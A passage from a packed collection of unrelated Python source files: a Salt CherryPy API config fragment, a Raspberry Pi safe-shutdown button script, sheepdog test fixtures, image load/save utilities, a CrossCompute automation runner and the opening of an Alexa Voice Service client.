        Set an attribute on the local instance for each key/val in url_map

        CherryPy uses class attributes to resolve URLs.
        """
        # Session-backed endpoints are dropped when sessions are disabled.
        if self.apiopts.get("enable_sessions", True) is False:
            blocked = {"login", "logout", "minions", "jobs"}
        else:
            blocked = set()

        for url, cls in self.url_map.items():
            if url not in blocked:
                setattr(self, url, cls())

    def _update_url_map(self):
        """
        Assemble any dynamic or configurable URLs
        """
        if HAS_WEBSOCKETS:
            self.url_map.update({"ws": WebsocketEndpoint})

        # Allow the Webhook URL to be overridden from the conf.
        self.url_map.update(
            {self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
        )

        # Enable the single-page JS app URL.
        self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})

    def get_conf(self):
        """
        Combine the CherryPy configuration with the rest_cherrypy config values
        pulled from the master config and return the CherryPy configuration
        """
        conf = {
            "global": {
                "server.socket_host": self.apiopts.get("host", "0.0.0.0"),
                "server.socket_port": self.apiopts.get("port", 8000),
                "server.thread_pool": self.apiopts.get("thread_pool", 100),
                "server.socket_queue_size": self.apiopts.get("queue_size", 30),
                "max_request_body_size": self.apiopts.get(
                    "max_request_body_size", 1048576
                ),
                "debug": self.apiopts.get("debug", False),
                "log.access_file": self.apiopts.get("log_access_file", ""),
                "log.error_file": self.apiopts.get("log_error_file", ""),
            },
            "/": {
                "request.dispatch": cherrypy.dispatch.MethodDispatcher(),
                "tools.trailing_slash.on": True,
                "tools.gzip.on": True,
                "tools.html_override.on": True,
                "tools.cors_tool.on": True,
            },
        }

        # CherryPy >= 12.0 no longer supports "timeout_monitor"; only set
        # this config option when using an older version of CherryPy.
        # See Issue #44601 for more information.
        if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
            conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
                "expire_responses", True
            )

        if cpstats and self.apiopts.get("collect_stats", False):
            conf["/"]["tools.cpstats.on"] = True

        if "favicon" in self.apiopts:
            conf["/favicon.ico"] = {
                "tools.staticfile.on": True,
                "tools.staticfile.filename": self.apiopts["favicon"],
            }

        if self.apiopts.get("debug", False) is False:
            conf["global"]["environment"] = "production"

        # Serve static media if the directory has been set in the configuration
        if "static" in self.apiopts:
            conf[self.apiopts.get("static_path", "/static")] = {
                "tools.staticdir.on": True,
                "tools.staticdir.dir": self.apiopts["static"],
            }

        # Add to global config
        cherrypy.config.update(conf["global"])

        return conf
def get_app(opts):
    """
    Returns a WSGI app and a configuration dictionary
    """
    # The rest_cherrypy section of the master config holds the api opts.
    apiopts = opts.get(__name__.rsplit(".", 2)[-2], {})

    # Add Salt and salt-api config options to the main CherryPy config dict
    cherrypy.config["saltopts"] = opts
    cherrypy.config["apiopts"] = apiopts

    root = API()  # cherrypy app
    cpyopts = root.get_conf()  # cherrypy app opts

    return root, apiopts, cpyopts
|
batocera_safeshutdown.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import os
import time
import subprocess
from multiprocessing import Process
# GPIO pin assignments (BCM numbering); "pin N" in the comments refers to
# the physical header pin.
powerPin = 3 #pin 5
ledPin = 14 #TXD - pin 8
resetPin = 2 #pin 3
powerenPin = 4 #pin 7
#initialize GPIO settings
def init():
    """Configure the GPIO pins used by the power/reset circuitry."""
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BCM)
    # Buttons are active-low inputs with internal pull-ups enabled.
    for button in (powerPin, resetPin):
        GPIO.setup(button, GPIO.IN, pull_up_down=GPIO.PUD_UP)
    GPIO.setup(ledPin, GPIO.OUT)
    GPIO.setup(powerenPin, GPIO.OUT)
    # Drive the power-enable line high to keep the board powered.
    GPIO.output(powerenPin, GPIO.HIGH)
#waits for user to hold button up to 1 second before issuing poweroff command
def poweroff():
    """Watch the power button and shut the system down when pressed."""
    while True:
        GPIO.wait_for_edge(powerPin, GPIO.FALLING)
        es_pid = int(subprocess.check_output(['batocera-es-swissknife', '--espid']))
        # Prefer the EmulationStation-aware shutdown when ES is running.
        if es_pid:
            os.system("batocera-es-swissknife --shutdown")
        else:
            os.system("shutdown -h now")
#blinks the LED to signal button being pushed
def ledBlink():
    """Keep the LED lit, and blink it while the power button is held down.

    The LED is driven high by default; once a falling edge is seen on the
    power button, the LED toggles at roughly 2.5 Hz for as long as the
    button remains pressed (input reads LOW).
    """
    while True:
        GPIO.output(ledPin, GPIO.HIGH)
        GPIO.wait_for_edge(powerPin, GPIO.FALLING)
        # NOTE: the original code recorded `start = time.time()` here but
        # never used it — dead code removed.
        while GPIO.input(powerPin) == GPIO.LOW:
            GPIO.output(ledPin, GPIO.LOW)
            time.sleep(0.2)
            GPIO.output(ledPin, GPIO.HIGH)
            time.sleep(0.2)
#resets the pi
def reset():
    """Reset button handler: kill the emulator, else restart ES, else reboot."""
    while True:
        GPIO.wait_for_edge(resetPin, GPIO.FALLING)
        es_pid = int(subprocess.check_output(['batocera-es-swissknife', '--espid']))
        emu_pid = int(subprocess.check_output(['batocera-es-swissknife', '--emupid']))
        if emu_pid:
            # An emulator is running — just kill it.
            os.system("batocera-es-swissknife --emukill")
        elif es_pid:
            # Only EmulationStation is running — restart it.
            os.system("batocera-es-swissknife --restart")
        else:
            os.system("shutdown -r now")
if __name__ == "__main__":
    #initialize GPIO settings
    init()
    #create a multiprocessing.Process instance for each function to enable parallelism
    powerProcess = Process(target = poweroff)
    powerProcess.start()
    ledProcess = Process(target = ledBlink)
    ledProcess.start()
    resetProcess = Process(target = reset)
    resetProcess.start()
    # Each worker loops forever, so these joins block indefinitely;
    # cleanup only runs if the workers are killed externally.
    powerProcess.join()
    ledProcess.join()
    resetProcess.join()
    GPIO.cleanup()
|
conftest.py | import os
import json
from multiprocessing import Process
from indexd import default_settings, get_app as get_indexd_app
from indexclient.client import IndexClient
import pytest
import requests
import requests_mock
from mock import patch
from psqlgraph import PsqlGraphDriver
from dictionaryutils import DataDictionary, dictionary
from datamodelutils import models, validators
from gen3authz.client.arborist.client import ArboristClient
from sheepdog.test_settings import (
INDEX_CLIENT,
)
from tests import utils
from tests.integration.datadict.api import app as _app, app_init, indexd_init
from tests.integration.datadict.submission.test_endpoints import put_cgci_blgsp
import importlib
def get_parent(path):
    """Return *path* truncated at its last ``/`` (the parent directory).

    Note: uses ``str.rfind``, so a path containing no ``/`` returns the
    path minus its final character (rfind yields -1) — preserved for
    backward compatibility. A leftover debug ``print(path)`` was removed.
    """
    return path[0 : path.rfind("/")]
# Absolute path to the dictionary schema directory used by the integration
# tests: the parent of this file's directory, plus "/datadict/schemas".
PATH_TO_SCHEMA_DIR = (
    get_parent(os.path.abspath(os.path.join(os.path.realpath(__file__), os.pardir)))
    + "/datadict/schemas"
)
# update these settings if you want to point to another db
def pg_config(use_ssl=False, isolation_level=None):
    """Build the keyword arguments for connecting PsqlGraphDriver to the
    test database.

    The host honors the ``PGPORT`` environment variable when set;
    ``use_ssl`` adds ``connect_args={"sslmode": "require"}`` and
    ``isolation_level``, when given, is passed straight through.
    """
    port = os.environ.get("PGPORT")
    host = "localhost" if port is None else "localhost:" + str(port)

    cfg = dict(
        host=host,
        user="test",
        password="test",  # nosec
        database="sheepdog_automated_test",
    )

    # set sslmode if it's given, otherwise use the default
    if use_ssl:
        cfg["connect_args"] = {"sslmode": "require"}

    # set isolation_level if it's given, otherwise use the default
    if isolation_level:
        cfg["isolation_level"] = isolation_level

    return cfg
@pytest.fixture
def require_index_exists_on(app, monkeypatch):
    # Force the app to require that a file index already exists in indexd.
    monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", True)
@pytest.fixture
def require_index_exists_off(app, monkeypatch):
    # Allow submissions even when no file index exists in indexd.
    monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", False)
def wait_for_indexd_alive(port):
    """Block until the indexd test server on *port* accepts HTTP requests.

    The previous implementation recursed on every failed attempt, which
    could blow Python's recursion limit if the server is slow to start;
    this iterative version polls the same endpoint until a request
    succeeds.
    """
    url = "http://localhost:{}/_status".format(port)
    while True:
        try:
            requests.get(url)
        except requests.ConnectionError:
            continue
        else:
            return
def wait_for_indexd_not_alive(port):
    """Block until the indexd test server on *port* stops answering.

    Iterative rewrite of an unbounded-recursion polling loop (see
    wait_for_indexd_alive): polls until the connection is refused.
    """
    url = "http://localhost:{}/_status".format(port)
    while True:
        try:
            requests.get(url)
        except requests.ConnectionError:
            return
@pytest.fixture
def app(tmpdir, request):
    """Build the sheepdog Flask test app with a live indexd subprocess.

    Starts indexd on a fixed port, writes a slicing fixture file into
    *tmpdir*, configures the app from sheepdog.test_settings, and
    registers a finalizer that removes the sqlite files and terminates
    indexd.
    """
    port = 8000
    dictionary_setup(_app)
    # this is to make sure sqlite is initialized
    # for every unit test
    importlib.reload(default_settings)
    # fresh files before running
    for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
        if os.path.exists(filename):
            os.remove(filename)

    indexd_app = get_indexd_app()
    indexd_init(*INDEX_CLIENT["auth"])
    # Run indexd in a separate process and wait until it answers /_status.
    indexd = Process(target=indexd_app.run, args=["localhost", port])
    indexd.start()
    wait_for_indexd_alive(port)

    # Gene coordinate fixture consumed by the slicing tests.
    gencode_json = tmpdir.mkdir("slicing").join("test_gencode.json")
    gencode_json.write(
        json.dumps(
            {
                "a_gene": ["chr1", None, 200],
                "b_gene": ["chr1", 150, 300],
                "c_gene": ["chr1", 200, None],
                "d_gene": ["chr1", None, None],
            }
        )
    )

    def teardown():
        # Remove the sqlite files and stop the indexd subprocess.
        for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
            if os.path.exists(filename):
                os.remove(filename)
        indexd.terminate()
        wait_for_indexd_not_alive(port)

    _app.config.from_object("sheepdog.test_settings")
    _app.config["PATH_TO_SCHEMA_DIR"] = PATH_TO_SCHEMA_DIR

    request.addfinalizer(teardown)

    app_init(_app)

    _app.logger.setLevel(os.environ.get("GDC_LOG_LEVEL", "WARNING"))

    # JWT verification key used by the auth layer during tests.
    _app.jwt_public_keys = {
        _app.config["USER_API"]: {
            "key-test": utils.read_file(
                "./integration/resources/keys/test_public_key.pem"
            )
        }
    }

    _app.auth = ArboristClient()

    return _app
@pytest.fixture(params=[False, True, None])
def use_ssl(request):
    """Parametrized ssl flag forwarded to pg_config."""
    # return False, True, None
    return request.param
@pytest.fixture(params=("READ_COMMITTED", "REPEATABLE_READ", "SERIALIZABLE", None))
def isolation_level(request):
    """Parametrized transaction isolation level forwarded to pg_config."""
    # return 'READ_COMMITTED', 'REPEATABLE_READ', 'SERIALIZABLE', None
    return request.param
@pytest.fixture
def pg_driver(request, client, use_ssl, isolation_level):
    """Yield a PsqlGraphDriver connected to the test database.

    All node/edge subclass tables and the bookkeeping tables are wiped
    both before the test runs and again at teardown.
    """
    pg_driver = PsqlGraphDriver(
        **pg_config(use_ssl=use_ssl, isolation_level=isolation_level)
    )

    def tearDown():
        # Delete every concrete node/edge subclass table, then the
        # versioning and transaction bookkeeping tables.
        with pg_driver.engine.begin() as conn:
            for table in models.Node().get_subclass_table_names():
                if table != models.Node.__tablename__:
                    conn.execute("delete from {}".format(table))  # nosec
            for table in models.Edge().get_subclass_table_names():
                if table != models.Edge.__tablename__:
                    conn.execute("delete from {}".format(table))  # nosec
            conn.execute("delete from versioned_nodes")
            conn.execute("delete from _voided_nodes")
            conn.execute("delete from _voided_edges")
            conn.execute("delete from transaction_snapshots")
            conn.execute("delete from transaction_documents")
            conn.execute("delete from transaction_logs")

    # Clean before the test as well as after it.
    tearDown()
    request.addfinalizer(tearDown)
    return pg_driver
@pytest.fixture()
def cgci_blgsp(client, submitter):
    """Run the put_cgci_blgsp helper with the test client and submitter headers."""
    put_cgci_blgsp(client, submitter)
@pytest.fixture()
def index_client():
    """Build an IndexClient from the INDEX_CLIENT settings (host, version, auth)."""
    return IndexClient(
        INDEX_CLIENT["host"], INDEX_CLIENT["version"], INDEX_CLIENT["auth"]
    )
def dictionary_setup(_app):
    """Initialize the data dictionary and gdcdatamodel models/validators for tests.

    Serves the local ``dictionary.json`` through a requests-mock adapter and
    patches ``requests.get`` so that DataDictionary(url=...) loads the local
    schema instead of hitting the network. The gdcdatamodel imports happen
    inside the patch block because they depend on the dictionary being
    initialized first.
    """
    print("dictionary setup")
    url = "s3://testurl"
    session = requests.Session()
    adapter = requests_mock.Adapter()
    session.mount("s3", adapter)
    json_dict = json.load(open(PATH_TO_SCHEMA_DIR + "/dictionary.json"))
    adapter.register_uri("GET", url, json=json_dict, status_code=200)
    resp = session.get(url)
    with patch("requests.get") as get_mocked:
        get_mocked.return_value = resp
        datadictionary = DataDictionary(url=url)
        dictionary.init(datadictionary)
        from gdcdatamodel import models as md
        from gdcdatamodel import validators as vd

        models.init(md)
        validators.init(vd)
|
utils.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import cv2
import os
import numpy as np
import threading
__all__ = [
'load_image',
'save_image',
'load_images',
'save_images',
]
def load_image(path):
    '''Load an image as an RGB numpy array.

    Parameters
    ----------
    path : str
        path of the image.

    Returns
    -------
    numpy.ndarray
        a numpy RGB image

    Raises
    ------
    ValueError
        if the file cannot be read as an image.

    Examples
    ----------
    With TensorLayerX

    >>> import tensorlayerx as tlx
    >>> path = './data/1.png'
    >>> image = tlx.vision.load_image(path)
    >>> print(image)

    '''
    image = cv2.imread(path)
    # cv2.imread silently returns None for a missing/unreadable file; fail
    # loudly here instead of crashing with an opaque error in cvtColor.
    if image is None:
        raise ValueError('could not read image: {}'.format(path))
    # OpenCV loads BGR; convert to the RGB convention used by this module.
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    return image
def save_image(image, file_name, path):
    '''Write an RGB image to ``path/file_name``.

    Parameters
    ----------
    image : numpy.ndarray
        The image to save
    file_name : str
        image name to save
    path : str
        path to save image

    Examples
    ----------
    With TensorLayerX

    >>> import tensorlayerx as tlx
    >>> load_path = './data/1.png'
    >>> save_path = './test/'
    >>> image = tlx.vision.load_image(path)
    >>> tlx.vision.save_image(image, file_name='1.png',path=save_path)

    '''
    # cv2.imwrite expects BGR channel order, so convert back from RGB first.
    target_path = os.path.join(path, file_name)
    bgr_image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
    cv2.imwrite(target_path, bgr_image)
def load_images(path, n_threads=10):
    '''Load every image in a folder, reading ``n_threads`` files concurrently.

    Parameters
    ----------
    path : str
        path of the images.
    n_threads : int
        The number of threads to read image.

    Returns
    -------
    list
        a list of numpy RGB images

    Examples
    ----------
    With TensorLayerX

    >>> import tensorlayerx as tlx
    >>> load_path = './data/'
    >>> image = tlx.vision.load_images(path)

    '''
    loaded = []
    file_names = sorted(os.listdir(path))
    # process the directory listing in batches of n_threads filenames
    for start in range(0, len(file_names), n_threads):
        batch = file_names[start:start + n_threads]
        loaded.extend(threading_data(batch, fn=load_image, path=path))
    return loaded
def save_images(images, file_names, path):
    '''Save a list of RGB images under ``path`` with the given file names.

    Parameters
    ----------
    images : list
        a list of numpy RGB images
    file_names : list
        a list of image names to save
    path : str
        path to save images

    Raises
    ------
    ValueError
        if ``images`` and ``file_names`` have different lengths.

    Examples
    ----------
    With TensorLayerX

    >>> import tensorlayerx as tlx
    >>> load_path = './data/'
    >>> save_path = './test/'
    >>> images = tlx.vision.load_images(path)
    >>> name_list = user_define
    >>> tlx.vision.save_images(images, file_names=name_list,path=save_path)

    '''
    if len(images) != len(file_names):
        raise ValueError(" The number of images should be equal to the number of file names.")
    for image, file_name in zip(images, file_names):
        # convert into a local copy instead of mutating the caller's list
        # (the original overwrote images[i] with the BGR version in place)
        bgr_image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
        cv2.imwrite(os.path.join(path, str(file_name)), bgr_image)
def threading_data(data=None, fn=None, thread_count=None, path=None):
    """Process a batch of data by given function by threading.

    Usually be used for data augmentation.

    Parameters
    -----------
    data : list
        The filenames to be processed.
    fn : function
        The function for data processing; receives the joined ``path/name``.
    thread_count : int or None
        The number of threads to use. When None, one thread per item is
        spawned and an array of per-item results is returned; otherwise the
        data is split into ``thread_count`` contiguous chunks and the chunk
        results are concatenated.
    path : str
        Folder prefix joined onto each item before calling ``fn``.

    Returns
    -------
    list or numpy array
        The processed results.

    References
    ----------
    - `python queue <https://pymotw.com/2/Queue/index.html#module-Queue>`__
    - `run with limited queue <http://effbot.org/librarybook/queue.htm>`__

    """

    def apply_fn(results, i, name, path):
        # one item per thread: store fn(path/name) at its slot
        results[i] = fn(os.path.join(path, name))

    def apply_fn_batch(results, i, names, path):
        # one chunk per thread: the original passed the whole list slice to
        # apply_fn, which crashed in os.path.join; map fn over each name
        results[i] = [fn(os.path.join(path, name)) for name in names]

    threads = []
    if thread_count is None:
        results = [None] * len(data)
        for i, name in enumerate(data):
            t = threading.Thread(
                name='threading_and_return', target=apply_fn, args=(results, i, name, path))
            t.start()
            threads.append(t)
    else:
        divs = np.linspace(0, len(data), thread_count + 1)
        divs = np.round(divs).astype(int)
        results = [None] * thread_count
        for i in range(thread_count):
            t = threading.Thread(
                name='threading_and_return', target=apply_fn_batch,
                args=(results, i, data[divs[i]:divs[i + 1]], path)
            )
            t.start()
            threads.append(t)

    for t in threads:
        t.join()

    if thread_count is None:
        try:
            return np.asarray(results, dtype=object)
        except Exception:
            return results
    else:
        return np.concatenate(results)
automation.py | # TODO: Trigger refresh on variable configuration update
# TODO: Watch multiple folders if not all under parent folder
# TODO: Consider whether to send partial updates for variables
# TODO: Precompile notebook scripts
import logging
import subprocess
from invisibleroads_macros_disk import is_path_in_folder, make_folder
from invisibleroads_macros_log import format_path
from logging import getLogger
from multiprocessing import Process, Queue, Value
from os import environ, getenv, listdir
from os.path import exists, isdir, join, realpath
from pyramid.config import Configurator
from time import time
from waitress import serve
from watchgod import watch
from ..constants import (
AUTOMATION_PATH,
DISK_DEBOUNCE_IN_MILLISECONDS,
DISK_POLL_IN_MILLISECONDS,
HOST,
MODE_NAMES,
PORT,
STREAMS_ROUTE)
from ..exceptions import (
CrossComputeConfigurationError,
CrossComputeError)
from ..macros.iterable import group_by
from ..macros.process import StoppableProcess
from ..routes.automation import AutomationRoutes
from ..routes.stream import StreamRoutes
from .configuration import (
get_automation_definitions,
get_display_configuration,
get_variable_definitions,
load_configuration)
from .variable import (
format_text,
get_variable_data_by_id,
save_variable_data)
class Automation():
    """Load, serve, watch, and run a crosscompute automation configuration."""

    @classmethod
    def load(Class, path_or_folder=None):
        """Build an instance from a configuration path, or from a folder containing one."""
        instance = Class()
        if isdir(path_or_folder):
            instance.initialize_from_folder(path_or_folder)
        else:
            instance.initialize_from_path(path_or_folder)
        return instance

    def reload(self):
        """Re-initialize from the stored path; fall back to scanning the folder if it is gone."""
        path = self.path
        if exists(path):
            self.initialize_from_path(path)
        else:
            self.initialize_from_folder(self.folder)

    def initialize_from_folder(self, folder):
        """Try each file in the folder (AUTOMATION_PATH first) until one loads.

        CrossComputeConfigurationError propagates immediately (the file was a
        configuration but invalid); other CrossComputeErrors mean "not a
        configuration" and the next file is tried. Raises CrossComputeError
        when no file in the folder is a configuration.
        """
        paths = listdir(folder)
        if AUTOMATION_PATH in paths:
            # prefer the canonical configuration filename when present
            paths.remove(AUTOMATION_PATH)
            paths.insert(0, AUTOMATION_PATH)
        for relative_path in paths:
            absolute_path = join(folder, relative_path)
            if isdir(absolute_path):
                continue
            try:
                self.initialize_from_path(absolute_path)
            except CrossComputeConfigurationError:
                raise
            except CrossComputeError:
                continue
            break
        else:
            raise CrossComputeError('could not find configuration')

    def initialize_from_path(self, path):
        """Load the configuration at path and (re)build all derived state."""
        configuration = load_configuration(path)
        self.path = path
        self.folder = configuration['folder']
        self.definitions = get_automation_definitions(configuration)
        self._file_type_by_path = self._get_file_type_by_path()
        # shared timestamp ('d' = double) used to signal clients that state changed
        self._timestamp_object = Value('d', time())
        L.debug('configuration_path = %s', path)

    def serve(
            self,
            host=HOST,
            port=PORT,
            is_static=False,
            is_production=False,
            disk_poll_in_milliseconds=DISK_POLL_IN_MILLISECONDS,
            disk_debounce_in_milliseconds=DISK_DEBOUNCE_IN_MILLISECONDS,
            base_uri='',
            automation_queue=None):
        """Serve the automation over HTTP, watching the disk unless static+production."""
        if automation_queue is None:
            automation_queue = Queue()
        if getLogger().level > logging.DEBUG:
            # silence noisy third-party loggers unless we are debugging
            getLogger('waitress').setLevel(logging.ERROR)
            getLogger('watchgod.watcher').setLevel(logging.ERROR)

        def run_server():
            # start a daemon worker that drains the automation queue
            L.info('starting worker')
            worker_process = Process(target=self.work, args=(
                automation_queue,))
            worker_process.daemon = True
            worker_process.start()
            L.info('serving at http://%s:%s%s', host, port, base_uri)
            # TODO: Decouple from pyramid and waitress
            app = self._get_app(
                automation_queue, is_static, is_production, base_uri)
            try:
                serve(app, host=host, port=port, url_prefix=base_uri)
            except OSError as e:
                L.error(e)

        if is_static and is_production:
            # nothing can change at runtime, so no file watcher is needed
            run_server()
            return
        self.watch(
            run_server, disk_poll_in_milliseconds,
            disk_debounce_in_milliseconds)

    def run(self):
        """Run every batch of every automation definition synchronously."""
        for automation_definition in self.definitions:
            for batch_definition in automation_definition.get('batches', []):
                run_automation(automation_definition, batch_definition)

    def work(self, automation_queue):
        """Drain the queue, running each (automation, batch) pack until interrupted."""
        try:
            while automation_pack := automation_queue.get():
                run_automation(*automation_pack)
        except KeyboardInterrupt:
            pass

    def watch(
            self, run_server, disk_poll_in_milliseconds,
            disk_debounce_in_milliseconds):
        """Run the server and react to disk changes by file type.

        'c' (configuration) restarts the server after a reload; 's' (style)
        refreshes display configuration; anything else just bumps the shared
        timestamp so clients refresh.
        """
        server_process = StoppableProcess(target=run_server)
        server_process.start()
        for changes in watch(
                self.folder, min_sleep=disk_poll_in_milliseconds,
                debounce=disk_debounce_in_milliseconds):
            for changed_type, changed_path in changes:
                try:
                    file_type = self._get_file_type(changed_path)
                except KeyError:
                    # not a file we track; ignore
                    continue
                L.debug('%s %s %s', changed_type, changed_path, file_type)
                if file_type == 'c':
                    try:
                        self.reload()
                    except CrossComputeError as e:
                        L.error(e)
                        continue
                    server_process.stop()
                    server_process = StoppableProcess(target=run_server)
                    server_process.start()
                elif file_type == 's':
                    for d in self.definitions:
                        d['display'] = get_display_configuration(d)
                    self._timestamp_object.value = time()
                else:
                    self._timestamp_object.value = time()

    def _get_app(self, automation_queue, is_static, is_production, base_uri):
        """Assemble the pyramid WSGI app with automation (and optionally stream) routes."""
        automation_routes = AutomationRoutes(
            self.definitions, automation_queue, self._timestamp_object)
        stream_routes = StreamRoutes(self._timestamp_object)
        with Configurator() as config:
            config.include('pyramid_jinja2')
            config.include(automation_routes.includeme)
            if not is_static:
                config.include(stream_routes.includeme)

            def update_renderer_globals():
                renderer_environment = config.get_jinja2_environment()
                renderer_environment.globals.update({
                    'BASE_JINJA2': 'base.jinja2',
                    'LIVE_JINJA2': 'live.jinja2',
                    'IS_STATIC': is_static,
                    'IS_PRODUCTION': is_production,
                    'BASE_URI': base_uri,
                    'STREAMS_ROUTE': STREAMS_ROUTE,
                })

            config.action(None, update_renderer_globals)
        return config.make_wsgi_app()

    def _get_file_type(self, path):
        """Classify a changed path; anything under a runs folder counts as variable data.

        Raises KeyError for untracked paths.
        """
        for automation_definition in self.definitions:
            automation_folder = automation_definition['folder']
            if is_path_in_folder(path, join(automation_folder, 'runs')):
                return 'v'
        return self._file_type_by_path[realpath(path)]

    def _get_file_type_by_path(self):
        'Set c = configuration, s = style, t = template, v = variable'
        file_type_by_path = {}

        def add(path, file_type):
            # index by realpath so watcher-reported paths resolve consistently
            file_type_by_path[realpath(path)] = file_type

        for path in [self.path] + [_['path'] for _ in self.definitions]:
            add(path, 'c')
        for automation_definition in self.definitions:
            folder = automation_definition['folder']
            configuration = load_configuration(automation_definition['path'])
            for batch_definition in configuration.get('batches', []):
                batch_configuration = batch_definition.get('configuration', {})
                if 'path' not in batch_configuration:
                    continue
                add(join(folder, batch_configuration['path']), 'c')
            for mode_name in MODE_NAMES:
                mode_configuration = automation_definition.get(mode_name, {})
                template_definitions = mode_configuration.get('templates', [])
                for template_definition in template_definitions:
                    if 'path' not in template_definition:
                        continue
                    add(join(folder, template_definition['path']), 't')
            for batch_definition in automation_definition.get('batches', []):
                for path in self._get_paths_from_folder(join(
                        folder, batch_definition['folder'])):
                    add(path, 'v')
            display_configuration = automation_definition.get('display', {})
            for style_definition in display_configuration.get('styles', []):
                if 'path' not in style_definition:
                    continue
                add(join(folder, style_definition['path']), 's')
        return file_type_by_path

    def _get_paths_from_folder(self, folder):
        """Collect variable data paths (and their configuration paths) under a batch folder."""
        paths = set()
        for automation_definition in self.definitions:
            for mode_name in MODE_NAMES:
                mode_configuration = automation_definition.get(mode_name, {})
                variable_definitions = mode_configuration.get('variables', [])
                for variable_definition in variable_definitions:
                    variable_configuration = variable_definition.get(
                        'configuration', {})
                    if 'path' in variable_configuration:
                        paths.add(join(folder, variable_configuration['path']))
                    paths.add(join(folder, variable_definition['path']))
        return paths
def run_automation(automation_definition, batch_definition):
    """Run one batch of an automation by executing its configured shell command.

    Prepares the batch folder and environment, creates a folder per mode,
    then runs the script with stdout/stderr captured to files in the debug
    folder. Errors are logged, never raised.
    """
    script_definition = automation_definition.get('script', {})
    command_string = script_definition.get('command')
    if not command_string:
        # nothing to execute for this automation
        return
    folder = automation_definition['folder']
    batch_folder, custom_environment = prepare_batch(
        automation_definition, batch_definition)
    L.info(
        '%s %s running %s', automation_definition['name'],
        automation_definition['version'],
        format_path(join(folder, batch_folder)))
    mode_folder_by_name = {_ + '_folder': make_folder(join(
        folder, batch_folder, _)) for _ in MODE_NAMES}
    script_environment = {
        'CROSSCOMPUTE_' + k.upper(): v for k, v in mode_folder_by_name.items()
    } | {'PATH': getenv('PATH', '')} | custom_environment
    L.debug('environment = %s', script_environment)
    debug_folder = mode_folder_by_name['debug_folder']
    o_path = join(debug_folder, 'stdout.txt')
    e_path = join(debug_folder, 'stderr.txt')
    try:
        with open(o_path, 'wt') as o_file, open(e_path, 'wt') as e_file:
            subprocess.run(
                format_text(command_string, mode_folder_by_name), check=True,
                shell=True,  # Expand $HOME and ~
                cwd=join(folder, script_definition.get('folder', '.')),
                env=script_environment, stdout=o_file, stderr=e_file)
    except OSError as e:
        L.error(e)
    except subprocess.CalledProcessError:
        # read captured stderr back for the log; use a context manager so the
        # handle is closed (the original leaked an open file object here)
        with open(e_path, 'rt') as e_file:
            L.error(e_file.read().rstrip())
def prepare_batch(automation_definition, batch_definition):
    """Prepare a batch for execution.

    Builds the custom environment from ENVIRONMENT-path variables and, when
    the batch carries data, writes each remaining input variable file into
    the batch's input folder. Returns (batch_folder, custom_environment).
    """
    variable_definitions = get_variable_definitions(
        automation_definition, 'input')
    definitions_by_path = group_by(variable_definitions, 'path')
    batch_folder = batch_definition['folder']
    data_by_id = batch_definition.get('data_by_id', {})
    # ENVIRONMENT-path variables are handled separately from file variables
    custom_environment = prepare_environment(
        automation_definition,
        definitions_by_path.pop('ENVIRONMENT', []),
        data_by_id)
    if data_by_id:
        automation_folder = automation_definition['folder']
        input_folder = make_folder(
            join(automation_folder, batch_folder, 'input'))
        for relative_path, definitions in definitions_by_path.items():
            save_variable_data(
                join(input_folder, relative_path), definitions, data_by_id)
    return batch_folder, custom_environment
def prepare_environment(
        automation_definition, variable_definitions, data_by_id):
    """Build the custom environment dict for a batch.

    Copies each configured environment variable from os.environ, fills any
    missing variable data from os.environ, and merges in the resolved
    variable data. Raises CrossComputeConfigurationError naming the variable
    that is missing from the environment.
    """
    custom_environment = {}
    data_by_id = data_by_id.copy()
    environment_variable_definitions = automation_definition.get(
        'environment', {}).get('variables', [])
    # try/except is narrowed to the environ lookups: in the original, a
    # KeyError raised by _['id'] before variable_id was bound would have
    # produced a NameError inside the handler
    for variable_id in (_['id'] for _ in environment_variable_definitions):
        try:
            custom_environment[variable_id] = environ[variable_id]
        except KeyError:
            raise CrossComputeConfigurationError(
                f'{variable_id} is missing in the environment')
    for variable_id in (_['id'] for _ in variable_definitions):
        if variable_id in data_by_id:
            continue
        try:
            data_by_id[variable_id] = environ[variable_id]
        except KeyError:
            raise CrossComputeConfigurationError(
                f'{variable_id} is missing in the environment')
    return custom_environment | get_variable_data_by_id(
        variable_definitions, data_by_id)
# Module-level logger, referenced throughout this module as `L`.
L = getLogger(__name__)
|
alexa.py | # -*- coding: utf-8 -*-
import base64
import cgi
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import uuid
if sys.version_info < (3, 0):
import Queue as queue
else:
import queue
import requests
import datetime
import hyper
from avs.mic import Audio
from avs.interface.alerts import Alerts
from avs.interface.audio_player import AudioPlayer
from avs.interface.speaker import Speaker
from avs.interface.speech_recognizer import SpeechRecognizer
from avs.interface.speech_synthesizer import SpeechSynthesizer
from avs.interface.system import System
import avs.config
import avs.auth
import requests
logger = logging.getLogger(__name__)
class AlexaStateListener(object):
    """Default Alexa state listener.

    Logs every state transition locally; the "Idle" and "Speaking" states
    are also POSTed to the remote speech-log endpoint.
    """

    ENDPOINT = "https://alexaapi.compositegrid.com/api/v1/speechLogs?text="

    def __init__(self):
        pass

    def _report(self, state_text):
        # push the state name to the remote speech-log endpoint
        requests.post(self.ENDPOINT + state_text)

    def on_ready(self):
        self._report("Idle")
        logger.info('on_ready')

    def on_disconnected(self):
        logger.info('on_disconnected')

    def on_listening(self):
        logger.info('on_listening')

    def on_thinking(self):
        logger.info('on_thinking')

    def on_speaking(self):
        self._report("Speaking")
        logger.info('on_speaking')

    def on_finished(self):
        self._report("Idle")
        logger.info('on_finished')
class Alexa(object):
    """Alexa Voice Service (AVS) client over an HTTP/2 connection.

    Maintains a downchannel for server-initiated directives and sends
    queued events (optionally with audio attachments) as multipart POSTs.
    """

    API_VERSION = 'v20160207'

